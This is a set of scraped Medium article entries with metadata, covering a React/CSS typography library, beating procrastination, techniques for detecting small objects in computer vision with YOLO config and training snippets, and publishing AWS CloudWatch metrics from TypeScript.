How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple Typography styles, simplified What’s Grotesk? Grotesk is a CSS library and React component that aims to make web typography simple. The reason I built it is because I’ve noticed I start almost every static website off with the same set of themes or typographic rules, so I decided to build a tiny library I can just plug into my next project easily. Since I mostly only work on React applications and plain ol’ static websites, I made a React component and a CSS library.
https://medium.com/better-programming/how-i-built-grotesk-a-react-component-and-css-library-that-makes-web-type-simple-a84b832aeb00
['Kartik Nair']
2020-03-03 06:34:42.647000+00:00
['CSS', 'Programming', 'Design', 'React', 'JavaScript']
Focus on Having a Good Time to Beat Your Procrastination
Focus on Having a Good Time to Beat Your Procrastination Focusing on micro-managing our time, just creates more boring chores to procrastinate over! Photo by Marcin Dampc from Pexels Procrastination has been my archenemy for at least 2 decades, and it has led to problems in work, in my relationships, and in life in general. It took me years of research and trying different approaches to eventually solve my procrastination problem. Most people find focusing on micro-managing their time is an important element in beating their procrastination. However, it does present two additional problems to the serial procrastinator. First, you have to beat your procrastination long enough to put the methods into action. Second, these methods are extra chores that your brain will procrastinate over. After spending years trying to manage my procrastination, I looked at the root causes of my procrastination and the reasoning behind them. By addressing what I found and managing my periods of procrastination, I could master my procrastination. Why Do We Procrastinate? Photo by Pixabay from Pexels Most of us procrastinate because our subconscious brain is rebelling in some form or another. Your brain could be rebelling against; Deadlines, including ones you have set yourself. (Your brain doesn’t like anything that holds authority over it or limits its choices). Things it doesn’t enjoy doing. Things it does not find stimulating enough. Not doing something it enjoys, or it thinks is more important. Other people will have other reasons for their brain rebelling and procrastinating but rarely is procrastination just laziness. The one common thing that runs through all the reasons is that your brain craves a better quality of life for itself. So, it simply rebels against anything that gets in its way of a better quality of life. It rebels against meeting that deadline. It rebels against doing things it doesn’t like. It rebels against anything that stops it from getting an instant hit of fun. Your brain is sulking like a naughty toddler who doesn’t get its way. For a more in-depth look at this phenomenon, I recommend reading the Chimp Paradox by Dr. Steve Peters. In short, your brain is simply seeking a better quality of life and wants to ignore anything that gets in its way. The Endless Procrastination Cycle Procrastination can become an endless cycle that gets harder to break the longer it goes on. Now a lot of us are working from home, we find procrastination is an easy trap to fall into. After all, no one can see if you are working or not. So, to make up for our procrastination, we work a bit longer than normal. Then we spend our evenings stressing about what we didn’t achieve during the day and how we will catch up in the morning. Eventually, the worry will start keeping you up at night. Before you know it, all of your quality time has been eaten up by work and stress. The tasks you procrastinated over now occupy your mind when you should be spending quality time with your friends and family. It keeps you awake at night and your brain’s quality of life declines further and further. The more your brain’s quality of life declines, the more it will find things to procrastinate over while it seeks a better quality of life. And so, the cycle continues downwards. Play Hard, Then Work Hard Photo by Vincent Gerbouin from Pexels So, I looked for ways of improving my brain’s quality of life and immediately ran into a problem. My brain is conditioned to believe that rewards come after hard work, and not before. 
So, my first plan was to promise myself treats if I completed a task. For the brains of non-procrastinators, this works really well. Unfortunately, the brains of procrastinators don’t normally work that way. They want the rewards now. My mind instantly rebelled against working for treats and started procrastinating again. It didn’t care what the size of my promised reward was, my brain kept on procrastinating because it wanted a better quality of life now, not later. So, I flipped things on their head and just took all the rewards I promised myself, regardless of any tasks I had completed or not. I made a conscious effort to fill my spare time with quality activities including; Spending quality time with my family and grandchildren Playing video games (something I have loved since the 80s) Country walks DIY / Gardening projects Learning to cook Blasting out my favorite tunes Binge-watching TV shows and films I also made other quality of life adjustments, such as removing my works email and messaging software off my phone. And I banned my phone from the bedroom and replaced it with a traditional alarm clock. This greatly limited how much my work life invaded my spare time and my quality of life. By filling my spare time with these quality activities, I achieved two things. First, I improved my brain’s quality of life by giving it what it craved. Second, I starved my brain of time to stress over my procrastination stopping the endless procrastination cycle. The first two weeks were hard, as I had to overcome decades of unhealthy habits. The biggest of which was a tendency to think work always came above and before everything else in life. The results were amazing. After the initial two weeks of setting up better habits, it only took a week or two for my procrastination at work to drop. Then my ability to study improved, and finally my relationships improved. 6 months later my procrastination is all but gone. Like most people, I still have tasks I hate doing and I drag my feet over them, but now they are manageable with simple time management techniques. With my brain experiencing a better quality of life, my time micro-management techniques stop being an extra chore to procrastinate over. Instead, they became more powerful and easier to implement and maintain. The Takeaways Photo by Blu Byrd from Pexels For most people, there is a lot to be said for the phrase “Work hard, play hard”, however, for procrastinators it is backward. We need to play hard and then work hard. If you use techniques to micro-manage your procrastination periods, hold on to them — they will play an even bigger role in the future. Improving your brain’s quality of life will make them as powerful as you initially hoped they would be. By improving your brain’s quality of life, you remove the primary reason for your brain to procrastinate over chores. Time micro-management techniques will still help make more effective use of your time and get through those times when your brain sulks for no apparent reason.
https://medium.com/swlh/focus-on-having-a-good-time-to-beat-your-procrastination-8660c0bb34c4
['Sammy Jones']
2020-12-19 22:20:25.567000+00:00
['Management', 'Life Lessons', 'Startup', 'Entrepreneurship', 'Business']
Tackling the Small Object Problem in Object Detection
Tackling the Small Object Problem in Object Detection Note: we have also published Tackling the Small Object Problem on our blog. Detecting small objects is one of the most challenging and important problems in computer vision. In this post, we will discuss some of the strategies we have developed at Roboflow by iterating on hundreds of small object detection models. Small objects as seen from above by drone in the public aerial maritime dataset To improve your model's performance on small objects, we recommend the following techniques: increasing your image capture resolution, increasing your model's input resolution, tiling your images, generating more data via augmentation, auto-learning model anchors, and filtering out extraneous classes. If you prefer video, I have also recorded a discussion of this post Why is the Small Object Problem Hard? The small object problem plagues object detection models worldwide. Not buying it? Check the COCO evaluation results for recent state of the art models YOLOv3, EfficientDet, and YOLOv4: Check out AP_S, AP_M, AP_L for state of the art models. Small objects are hard! (cite) In EfficientDet for example, AP on small objects is only 12%, compared with an AP of 51% for large objects. That is almost a fivefold difference! So why is detecting small objects so hard? It all comes down to the model. Object detection models form features by aggregating pixels in convolutional layers. Feature aggregation for object detection in PP-YOLO And at the end of the network a prediction is made based on a loss function, which sums up across pixels based on the difference between prediction and ground truth. The loss function in YOLO If the ground truth box is not large, the signal will be small while training is occurring. Furthermore, small objects are the most likely to suffer from data labeling errors, where their identification may be omitted. Empirically and theoretically, small objects are hard. Increasing your image capture resolution Resolution, resolution, resolution… it is all about resolution. Very small objects may contain only a few pixels within the bounding box — meaning it is very important to increase the resolution of your images to increase the richness of features that your detector can form from that small box. Therefore, we suggest capturing images at as high a resolution as possible. Increasing your model's input resolution Once you have your images at higher resolution, you can scale up your model's input resolution. Warning: this will result in a large model that takes longer to train, and will be slower to infer when you start deployment. You may have to run experiments to find the right tradeoff between speed and performance. You can easily scale your input resolution in our tutorial on training YOLOv4 by changing the image size in the config file. [net] batch=64 subdivisions=36 width={YOUR RESOLUTION WIDTH HERE} height={YOUR RESOLUTION HEIGHT HERE} channels=3 momentum=0.949 decay=0.0005 angle=0 saturation = 1.5 exposure = 1.5 hue = .1 learning_rate=0.001 burn_in=1000 max_batches=6000 policy=steps steps=4800.0,5400.0 scales=.1,.1 You can also easily scale your input resolution in our tutorial on how to train YOLOv5 by changing the image size parameter in the training command: !python train.py --img {YOUR RESOLUTION SIZE HERE} --batch 16 --epochs 10 --data '../data.yaml' --cfg ./models/custom_yolov5s.yaml --weights '' --name yolov5s_results --cache Note: you will only see improved results up to the maximum resolution of your training data. Tiling your images Another great tactic for detecting small objects is to tile your images as a preprocessing step.
Tiling effectively zooms your detector in on small objects, but allows you to keep the small input resolution you need in order to be able to run fast inference. Tiling images as a preprocessing step in Roboflow If you use tiling during training, it is important to remember that you will also need to tile your images at inference time. Generating More Data Via Augmentation Data augmentation generates new images from your base dataset. This can be very useful to prevent your model from overfitting to the training set. Some especially useful augmentations for small object detection include random crop, random rotation, and mosaic augmentation. Auto Learning Model Anchors Anchor boxes are prototypical bounding boxes that your model learns to predict in relation to. That said, anchor boxes can be preset and sometime suboptimal for your training data. It is good to custom tune these to your task at hand. Thankfully, the YOLOv5 model architecture does this for you automatically based on your custom data. All you have to do is kick off training. Analyzing anchors... anchors/target = 4.66, Best Possible Recall (BPR) = 0.9675. Attempting to generate improved anchors, please wait... WARNING: Extremely small objects found. 35 of 1664 labels are < 3 pixels in width or height. Running kmeans for 9 anchors on 1664 points... thr=0.25: 0.9477 best possible recall, 4.95 anchors past thr n=9, img_size=416, metric_all=0.317/0.665-mean/best, past_thr=0.465-mean: 18,24, 65,37, 35,68, 46,135, 152,54, 99,109, 66,218, 220,128, 169,228 Evolving anchors with Genetic Algorithm: fitness = 0.6825: 100%|██████████| 1000/1000 [00:00<00:00, 1081.71it/s] thr=0.25: 0.9627 best possible recall, 5.32 anchors past thr n=9, img_size=416, metric_all=0.338/0.688-mean/best, past_thr=0.476-mean: 13,20, 41,32, 26,55, 46,72, 122,57, 86,102, 58,152, 161,120, 165,204 Filtering Out Extraneous Classes Class management is an important technique to improve the quality of your dataset. If you have one class that is significantly overlapping with another class, you should filter this class from your dataset. And perhaps, you decide that the small object in your dataset is not worth detecting, so you may want to take it out. You can quickly identify all of these issues with the Advanced Dataset Health Check that is a part of Roboflow Pro. Class omission and class renaming are all possible through Roboflow’s ontology management tools. Conclusion Properly detecting small objects is truly a challenge. In this post, we have discussed a few strategies for improving your small object detector, namely: As always, happy detecting!
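As a small illustration of the tiling tactic discussed above, here is a minimal Python sketch that cuts a large image into overlapping fixed-size tiles before training or inference. The tile size, overlap, and file paths are arbitrary choices rather than Roboflow's implementation, and the matching cropping and offsetting of bounding-box labels is omitted for brevity. Remember that if you tile during training, you will need to tile at inference time as well.

# Minimal tiling sketch; tile size, overlap, and paths are arbitrary, and the matching
# adjustment of bounding-box labels is omitted for brevity.
import os
from PIL import Image

def tile_image(path, tile=416, overlap=64):
    """Yield (x0, y0, crop) tiles that cover the full image with some overlap."""
    img = Image.open(path)
    w, h = img.size
    step = tile - overlap
    for y0 in range(0, max(h - overlap, 1), step):
        for x0 in range(0, max(w - overlap, 1), step):
            x1, y1 = min(x0 + tile, w), min(y0 + tile, h)
            yield x0, y0, img.crop((x0, y0, x1, y1))

os.makedirs("tiles", exist_ok=True)
for i, (x0, y0, crop) in enumerate(tile_image("drone_frame.jpg")):
    crop.save(f"tiles/drone_frame_{i}_{x0}_{y0}.jpg")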
https://towardsdatascience.com/tackling-the-small-object-problem-in-object-detection-6e1c9976ee69
['Jacob Solawetz']
2020-10-12 14:31:18.087000+00:00
['Artificial Intelligence', 'Data Science', 'Object Detection', 'Computer Vision', 'Deep Learning']
Benchmarking API Endpoints With TypeScript Decorators
Publishing CloudWatch Metrics With the API set up, I want it to send metrics to CloudWatch so we can use it later. But first, I will quickly go through some basic CloudWatch concepts if you’ve never used them before. If you want to dive more into it, I found this post by Mathew Kenny Thomas which explains each concept in more detail. CloudWatch is a monitoring service offered by AWS. There are namespaces in CloudWatch that serve as containers for the metrics that we publish. Usually, each application publishes metrics with a unique namespace within an organization. You can think of these metrics as sets of data representing the value of a variable over time. For example, this variable can be the CPU usage of an EC2 instance and the data points represent the percentage utilization of CPU over time. You can also define your own custom metrics and publish them to CloudWatch, and then you can retrieve statistics about them by creating a dashboard. That’s what we will be doing here. I created a utility class for it: A metric in CloudWatch has dimensions, which are name/value pairs that are part of the identity of a metric. We can associate a maximum of ten dimensions to a metric. On line 34, I added a dimension to indicate the environment of the API, to distinguish testing metrics from production. In addition, a metric has properties like the metric name, the value, and the unit of the data point. This type is defined by MetricData type on line 3. The _metricsQueue is used to batch metrics together to reduce AWS request calls. Each API call to use putMetricData costs money, and we can avoid that cost if we send multiple metrics in one go. Luckily, this method allows us to do that. The parameter of putMetricData is as follows: MetricData.member.N The data for the metric. The array can include no more than 20 metrics per call. This means the MetricData parameter that we pass into putMetricData can be an array of metrics, and each item has the type MetricData . So our class maintains a queue that stores up to ten metrics. When the queue is full, we publish all of them at once with namespace My API on line 57. We return the promise of the sdk call and let the controller handle the result. This is a very simple implementation of batching, but there is a more powerful library to handle this if you are looking to save some AWS costs. Mixmax made a blogpost showing how they saved a decent amount of operating cost by batching up metrics: “Batching CloudWatch metrics.” Now we have a utility that publishes metrics to CloudWatch, let’s see how we can use it inside a TypeScript decorator.
https://medium.com/better-programming/benchmarking-api-endpoints-with-typescript-decorators-27cd462be488
['Michael Chi']
2020-11-03 19:03:04.318000+00:00
['JavaScript', 'Web Development', 'Typescript', 'AWS', 'Programming']